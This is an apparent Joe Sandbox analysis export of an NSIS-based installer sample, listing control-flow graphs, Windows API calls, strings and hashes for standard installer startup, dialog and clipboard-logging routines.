                                                                                                          control_flow_graph 0 4050cd-4050e8 1 405295-40529c 0->1 2 4050ee-4051d5 GetDlgItem * 3 call 403d98 call 404476 call 406805 call 4062a3 GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052c6-4052d3 1->3 4 40529e-4052c0 GetDlgItem CreateThread CloseHandle 1->4 35 4051f3-4051f6 2->35 36 4051d7-4051f1 SendMessageW * 2 2->36 6 4052f4-4052fb 3->6 7 4052d5-4052de 3->7 4->3 11 405352-405356 6->11 12 4052fd-405303 6->12 9 4052e0-4052ef ShowWindow * 2 call 403d98 7->9 10 405316-40531f call 403dca 7->10 9->6 22 405324-405328 10->22 11->10 14 405358-40535b 11->14 16 405305-405311 call 403d18 12->16 17 40532b-40533b ShowWindow 12->17 14->10 20 40535d-405370 SendMessageW 14->20 16->10 23 40534b-40534d call 403d18 17->23 24 40533d-405346 call 404f72 17->24 27 405376-405397 CreatePopupMenu call 406805 AppendMenuW 20->27 28 40528e-405290 20->28 23->11 24->23 37 405399-4053aa GetWindowRect 27->37 38 4053ac-4053b2 27->38 28->22 39 405206-40521d call 403d3f 35->39 40 4051f8-405204 SendMessageW 35->40 36->35 41 4053b3-4053cb TrackPopupMenu 37->41 38->41 46 405253-405274 GetDlgItem SendMessageW 39->46 47 40521f-405233 ShowWindow 39->47 40->39 41->28 43 4053d1-4053e8 41->43 45 4053ed-405408 SendMessageW 43->45 45->45 48 40540a-40542d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 46->28 51 405276-40528c SendMessageW * 2 46->51 49 405242 47->49 50 405235-405240 ShowWindow 47->50 52 40542f-405458 SendMessageW 48->52 53 405248-40524e call 403d98 49->53 50->53 51->28 52->52 54 40545a-405474 GlobalUnlock SetClipboardData CloseClipboard 52->54 53->46 54->28
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                                                                          • GetClientRect.USER32(?,?), ref: 00405196
                                                                                                          • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                                                                          • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                                                                          • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                                                                          • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                                                                            • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                                                                          • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                                                                                          • ShowWindow.USER32(00000000), ref: 004052E7
                                                                                                          • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                                                                          • ShowWindow.USER32(00000008), ref: 00405333
                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                                                                          • CreatePopupMenu.USER32 ref: 00405376
                                                                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                                                                          • GetWindowRect.USER32(?,?), ref: 0040539E
                                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                                                                          • OpenClipboard.USER32(00000000), ref: 0040540B
                                                                                                          • EmptyClipboard.USER32 ref: 00405411
                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00405427
                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                                                                          • CloseClipboard.USER32 ref: 0040546E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                          • String ID: @rD$New install of "%s" to "%s"${
                                                                                                          • API String ID: 2110491804-2409696222
                                                                                                          • Opcode ID: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                                                                          • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                                                                          • Opcode Fuzzy Hash: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                                                                          • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 305 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 312 403923-403937 call 405d06 CharNextW 305->312 313 40391b-40391e 305->313 316 4039ca-4039d0 312->316 313->312 317 4039d6 316->317 318 40393c-403942 316->318 319 4039f5-403a0d GetTempPathW call 4037cc 317->319 320 403944-40394a 318->320 321 40394c-403950 318->321 328 403a33-403a4d DeleteFileW call 403587 319->328 329 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 319->329 320->320 320->321 323 403952-403957 321->323 324 403958-40395c 321->324 323->324 326 4039b8-4039c5 call 405d06 324->326 327 40395e-403965 324->327 326->316 342 4039c7 326->342 331 403967-40396e 327->331 332 40397a-40398c call 403800 327->332 345 403acc-403adb call 403859 CoUninitialize 328->345 346 403a4f-403a55 328->346 329->328 329->345 333 403970-403973 331->333 334 403975 331->334 343 4039a1-4039b6 call 403800 332->343 344 40398e-403995 332->344 333->332 333->334 334->332 342->316 343->326 361 4039d8-4039f0 call 407d6e call 406009 343->361 348 403997-40399a 344->348 349 40399c 344->349 359 403ae1-403af1 call 405ca0 ExitProcess 345->359 360 403bce-403bd4 345->360 351 403ab5-403abc call 40592c 346->351 352 403a57-403a60 call 405d06 346->352 348->343 348->349 349->343 358 403ac1-403ac7 call 4060e7 351->358 362 403a79-403a7b 352->362 358->345 365 403c51-403c59 360->365 366 403bd6-403bf3 call 4062fc * 3 360->366 361->319 370 403a62-403a74 call 403800 362->370 371 403a7d-403a87 362->371 372 403c5b 365->372 373 403c5f 365->373 397 403bf5-403bf7 366->397 398 403c3d-403c48 ExitWindowsEx 366->398 370->371 384 403a76 370->384 378 403af7-403b11 lstrcatW lstrcmpiW 371->378 379 403a89-403a99 call 40677e 371->379 372->373 378->345 383 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 378->383 379->345 390 403a9b-403ab1 call 406009 * 2 379->390 387 403b36-403b56 call 406009 * 2 383->387 388 403b2b-403b31 call 406009 383->388 384->362 404 403b5b-403b77 call 406805 DeleteFileW 387->404 388->387 390->351 397->398 402 403bf9-403bfb 397->402 398->365 401 403c4a-403c4c call 40141d 398->401 401->365 402->398 406 403bfd-403c0f GetCurrentProcess 402->406 412 403bb8-403bc0 404->412 413 403b79-403b89 CopyFileW 404->413 406->398 411 403c11-403c33 406->411 411->398 412->404 414 403bc2-403bc9 call 406c68 412->414 413->412 415 403b8b-403bab call 406c68 call 406805 call 405c3f 413->415 414->345 415->412 425 403bad-403bb4 CloseHandle 415->425 425->412
                                                                                                          APIs
                                                                                                          • #17.COMCTL32 ref: 004038A2
                                                                                                          • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                                                                          • OleInitialize.OLE32(00000000), ref: 004038B4
                                                                                                            • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                            • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                            • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                          • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                                                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                          • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                                                                          • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                                                                          • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                                                                          • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                                                                          • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                                                                          • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                                                                          • CoUninitialize.COMBASE(?), ref: 00403AD1
                                                                                                          • ExitProcess.KERNEL32 ref: 00403AF1
                                                                                                          • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                                                                          • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                                                                          • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                                                                          • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                                                                          • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                                                                          • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                                                                          • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                                                                          • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                          • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                                                                          • API String ID: 2435955865-239407132
                                                                                                          • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                                                          • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                                                                          • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                                                          • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 820 4074bb-4074c0 821 4074c2-4074ef 820->821 822 40752f-407547 820->822 824 4074f1-4074f4 821->824 825 4074f6-4074fa 821->825 823 407aeb-407aff 822->823 829 407b01-407b17 823->829 830 407b19-407b2c 823->830 826 407506-407509 824->826 827 407502 825->827 828 4074fc-407500 825->828 831 407527-40752a 826->831 832 40750b-407514 826->832 827->826 828->826 833 407b33-407b3a 829->833 830->833 836 4076f6-407713 831->836 837 407516 832->837 838 407519-407525 832->838 834 407b61-407c68 833->834 835 407b3c-407b40 833->835 851 407350 834->851 852 407cec 834->852 840 407b46-407b5e 835->840 841 407ccd-407cd4 835->841 843 407715-407729 836->843 844 40772b-40773e 836->844 837->838 839 407589-4075b6 838->839 847 4075d2-4075ec 839->847 848 4075b8-4075d0 839->848 840->834 845 407cdd-407cea 841->845 849 407741-40774b 843->849 844->849 850 407cef-407cf6 845->850 853 4075f0-4075fa 847->853 848->853 854 40774d 849->854 855 4076ee-4076f4 849->855 856 407357-40735b 851->856 857 40749b-4074b6 851->857 858 40746d-407471 851->858 859 4073ff-407403 851->859 852->850 862 407600 853->862 863 407571-407577 853->863 864 407845-4078a1 854->864 865 4076c9-4076cd 854->865 855->836 861 407692-40769c 855->861 856->845 866 407361-40736e 856->866 857->823 871 407c76-407c7d 858->871 872 407477-40748b 858->872 877 407409-407420 859->877 878 407c6d-407c74 859->878 867 4076a2-4076c4 861->867 868 407c9a-407ca1 861->868 880 407556-40756e 862->880 881 407c7f-407c86 862->881 869 40762a-407630 863->869 870 40757d-407583 863->870 864->823 873 407c91-407c98 865->873 874 4076d3-4076eb 865->874 866->852 882 407374-4073ba 866->882 867->864 868->845 883 40768e 869->883 884 407632-40764f 869->884 870->839 870->883 871->845 879 40748e-407496 872->879 873->845 874->855 885 407423-407427 877->885 878->845 879->858 889 407498 879->889 880->863 881->845 887 4073e2-4073e4 882->887 888 4073bc-4073c0 882->888 883->861 890 407651-407665 884->890 891 407667-40767a 884->891 885->859 886 407429-40742f 885->886 893 407431-407438 886->893 894 407459-40746b 886->894 897 4073f5-4073fd 887->897 898 4073e6-4073f3 887->898 895 4073c2-4073c5 GlobalFree 888->895 896 4073cb-4073d9 GlobalAlloc 888->896 889->857 892 40767d-407687 890->892 891->892 892->869 899 407689 892->899 900 407443-407453 GlobalAlloc 893->900 901 40743a-40743d GlobalFree 893->901 894->879 895->896 896->852 902 4073df 896->902 897->885 898->897 898->898 904 407c88-407c8f 899->904 905 40760f-407627 899->905 900->852 900->894 901->900 902->887 904->845 905->869
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                                          • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                                                                          • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                                          • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                                                                          APIs
                                                                                                          • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                          • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                          • String ID:
                                                                                                          • API String ID: 310444273-0
                                                                                                          • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                                          • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                                                                          • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                                          • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                                                                          APIs
                                                                                                          • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                                          • FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                          • String ID:
                                                                                                          • API String ID: 2295610775-0
                                                                                                          • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                                          • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                                                                          • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                                          • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 56 405479-40548b 57 405491-405497 56->57 58 4055cd-4055dc 56->58 57->58 59 40549d-4054a6 57->59 60 40562b-405640 58->60 61 4055de-405626 GetDlgItem * 2 call 403d3f SetClassLongW call 40141d 58->61 62 4054a8-4054b5 SetWindowPos 59->62 63 4054bb-4054be 59->63 65 405680-405685 call 403daf 60->65 66 405642-405645 60->66 61->60 62->63 68 4054c0-4054d2 ShowWindow 63->68 69 4054d8-4054de 63->69 74 40568a-4056a5 65->74 71 405647-405652 call 40139d 66->71 72 405678-40567a 66->72 68->69 75 4054e0-4054f5 DestroyWindow 69->75 76 4054fa-4054fd 69->76 71->72 93 405654-405673 SendMessageW 71->93 72->65 73 405920 72->73 81 405922-405929 73->81 79 4056a7-4056a9 call 40141d 74->79 80 4056ae-4056b4 74->80 82 4058fd-405903 75->82 84 405510-405516 76->84 85 4054ff-40550b SetWindowLongW 76->85 79->80 89 4056ba-4056c5 80->89 90 4058de-4058f7 DestroyWindow KiUserCallbackDispatcher 80->90 82->73 87 405905-40590b 82->87 91 4055b9-4055c8 call 403dca 84->91 92 40551c-40552d GetDlgItem 84->92 85->81 87->73 95 40590d-405916 ShowWindow 87->95 89->90 96 4056cb-405718 call 406805 call 403d3f * 3 GetDlgItem 89->96 90->82 91->81 97 40554c-40554f 92->97 98 40552f-405546 SendMessageW IsWindowEnabled 92->98 93->81 95->73 126 405723-40575f ShowWindow KiUserCallbackDispatcher call 403d85 EnableWindow 96->126 127 40571a-405720 96->127 101 405551-405552 97->101 102 405554-405557 97->102 98->73 98->97 103 405582-405587 call 403d18 101->103 104 405565-40556a 102->104 105 405559-40555f 102->105 103->91 107 4055a0-4055b3 SendMessageW 104->107 109 40556c-405572 104->109 105->107 108 405561-405563 105->108 107->91 108->103 112 405574-40557a call 40141d 109->112 113 405589-405592 call 40141d 109->113 122 405580 112->122 113->91 123 405594-40559e 113->123 122->103 123->122 130 405761-405762 126->130 131 405764 126->131 127->126 132 405766-405794 GetSystemMenu EnableMenuItem SendMessageW 130->132 131->132 133 405796-4057a7 SendMessageW 132->133 134 4057a9 132->134 135 4057af-4057ed call 403d98 call 406009 lstrlenW call 406805 SetWindowTextW call 40139d 133->135 134->135 135->74 144 4057f3-4057f5 135->144 144->74 145 4057fb-4057ff 144->145 146 405801-405807 145->146 147 40581e-405832 DestroyWindow 145->147 146->73 148 40580d-405813 146->148 147->82 149 405838-405865 CreateDialogParamW 147->149 148->74 150 405819 148->150 149->82 151 40586b-4058c2 call 403d3f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 149->151 150->73 151->73 156 4058c4-4058d7 ShowWindow call 403daf 151->156 158 4058dc 156->158 158->82
                                                                                                          APIs
                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                                                                          • ShowWindow.USER32(?), ref: 004054D2
                                                                                                          • DestroyWindow.USER32 ref: 004054E6
                                                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                                                                          • GetDlgItem.USER32(?,?), ref: 00405523
                                                                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                                                                          • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                                                                          • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                                                                                          • EnableWindow.USER32(?,?), ref: 00405757
                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                                                                          • EnableMenuItem.USER32(00000000), ref: 00405774
                                                                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                                                                          • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                                                                          • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                          • String ID: @rD
                                                                                                          • API String ID: 3282139019-3814967855
                                                                                                          • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                                                          • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                                                                          • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                                                          • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
